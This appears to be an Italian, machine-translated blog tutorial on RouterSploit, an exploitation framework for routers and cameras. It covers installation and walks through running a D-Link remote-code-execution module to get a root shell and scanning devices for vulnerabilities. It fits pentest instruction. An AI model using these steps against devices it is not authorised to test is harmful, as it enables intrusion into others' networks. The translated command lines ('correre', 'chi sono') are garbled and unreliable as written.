Strumenti Linux

RouterSploit – Tutorial completo di Exploitation Framework [2020]

RouterSploit è un fantastico framework di sfruttamento realizzato appositamente per i dispositivi embedded.

Questo strumento può essere utilizzato da pentester per eseguire la scansione della sicurezza di telecamere e router.

Punti salienti di RouterSploit:

  • Codificato in Python.
  • Interfaccia della riga di comando.
  • Supporto Docker.
  • Strumenti modulari.

Sistema operativo supportato:

  1. Mac OS.
  2. Linux.
  3. Telefono Android.
  4. finestre.

Installazione di RouterSploit:

Requisiti:

  • futuro
  • richieste
  • paramiko
  • pysnmp
  • pycrypto

Opzionale:

  • bluepy - bluetooth a basso consumo energetico

Installazione in Kali Linux:

Segui i comandi seguenti:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Supporto Bluetooth Low Energy:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installazione in Ubuntu:

Segui i comandi seguenti:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Supporto Bluetooth Low Energy:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installazione su MacOS:

Segui i comandi seguenti:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Installazione su Docker:

Segui i comandi seguenti:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Come aggiornare RouterSploit?

È necessario aggiornare RouterSploit spesso per evitare inconvenienti.

I nuovi moduli vengono spediti quasi ogni giorno.

cd routersploit
git pull

Come utilizzare RouterSploit?

uso

root @ kalidev:~ / git / routerploit # ./rsf.py
 ______ _ _____ _ _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_ / / ___ _ _| |_ ___ _ __  `-. _ __ | | ___ _| |_
 |    // _ \| | | | __ / _ \ '__|`-. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __ / |  /\__ / / |_) | | (_) | | |_
  _| \_  ___ /  __,_|\__  ___|_|  \____ /| .__ /|_|\___ /|_|\__|
                                     | |
       Framework di sfruttamento per    |_|   di Threat9
            Dispositivi incorporati
  
 Nome in codice   : Sapevo che avresti portato guai
 Versione    : 3.3.0
 Homepage   : https://www.threat9.com/ - @threatnine
 Unisciti a Slack : routerploit.slack.com

 Partecipa al programma beta di Threat9 - https://www.threat9.com/

 Exploit: 128 Scanner: 4 Creds: 165 Generico: 4 Payload: 32 Codificatori: 6

rsf >

Exploit:

Per preformare lo sfruttamento, basta scegliere il modulo e impostare l'obiettivo:

rsf > utilizzare exploit /
exploits / 2wire / exploits / asmax / exploits / asus / exploits / cisco / exploits / dlink / exploits / fortinet / exploits / juniper / exploits / linksys / exploits / multi / exploits / netgear /
rsf > usa exploit / dlink / dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >

Per il completamento utilizzare il tasto Tab.

Per visualizzare le opzioni, genere show:

rsf (D-LINK DIR-300 & DIR-600 RCE) > mostra le opzioni

Opzioni di destinazione:


   Nome Impostazioni correnti Descrizione                                
   ----       ----------------     -----------                                
   target Indirizzo di destinazione ad es. http://192.168.1.1     
   porta       80                   Porta di destinazione

Uso run o exploit comando per sfruttare il bersaglio:

rsf (D-LINK DIR-300 & DIR-600 RCE) > correre
[+] L'obiettivo è vulnerabile
[*] Richiamo del ciclo di comandi ...
cmd > chi sono
radice

Per impostare le opzioni:

rsf (D-LINK DIR-300 & DIR-600 RCE) > imposta target http://192.168.1.1 [+] {'bersaglio': 'http://192.168.1.1'}

È possibile verificare se il bersaglio è vulnerabile a un particolare exploit:

rsf (D-LINK DIR-300 & DIR-600 RCE) > dai un'occhiata
[+] L'obiettivo è vulnerabile

Correre show info per visualizzare informazioni sull'exploit.

Scansione per obiettivi vulnerabili:

Gli scanner consentono di verificare rapidamente se l'obiettivo è vulnerabile a eventuali exploit.

Utilizzare gli stessi comandi per visualizzare / impostare le opzioni, e anche a correre.

rsf (Scanner D-Link) > correre
[+] exploits / dlink / dwr_932_info_disclosure è vulnerabile
[-] exploits / dlink / dir_300_320_615_auth_bypass non è vulnerabile
[-] exploits / dlink / dsl_2750b_info_disclosure non è vulnerabile
[-] exploits / dlink / dns_320l_327l_rce non è vulnerabile
[-] exploits / dlink / dir_645_password_disclosure non è vulnerabile
[-] exploits / dlink / dir_300_600_615_info_disclosure non è vulnerabile
[-] exploits / dlink / dir_300_600_rce non è vulnerabile

[+] Il dispositivo è vulnerabile!
- exploits / dlink / dwr_932_info_disclosure

RouterSploit ufficiale

Leggi anche: 1337x proxy

Parole finali:

RouterSploit è uno strumento straordinario da usare.

In caso di problemi relativi a RouterSploit. Assicurati di commentare in basso. Il nostro team CSHAWK ti contatterà al più presto.

Il Suyash

Questo è Suyash dall'India. Un entusiasta di CyberSecurity, YouTuber, Blogger, Libero professionista e un pentester. Di solito scrive articoli per condividere le sue conoscenze con il mondo.

Recent Posts

Top Apps and Software for Budding Musicians

With the rise of many technological trends, all industries are reaping the benefits. Different technologies

2 years ago

Superiore 9 Tips to Keep Yourself Safe When Gaming Online

Online gaming is the latest normal in today’s fast-paced digital world. The internet now offers

2 years ago

Pros And Cons Of Getting A Tax Extension for Your Fintech Business

Tax season: the time of year many individuals and businesses dread. The weight of ensuring

2 years ago

Superiore 5 Games Which Became Most Popular in 2023 – Detailed Review!

As we enter in the final months of 2023, we can talk more clearly about

2 years ago

Minecraft Legend sarà mai gratuito??

Dalla sua uscita nel 2011, Minecraft has become one of the most played video games

2 years ago

È possibile giocare a Minecraft Java con Xbox?

Minecraft è attivo da più di un decennio, and in that time it has

2 years ago

This website uses cookies.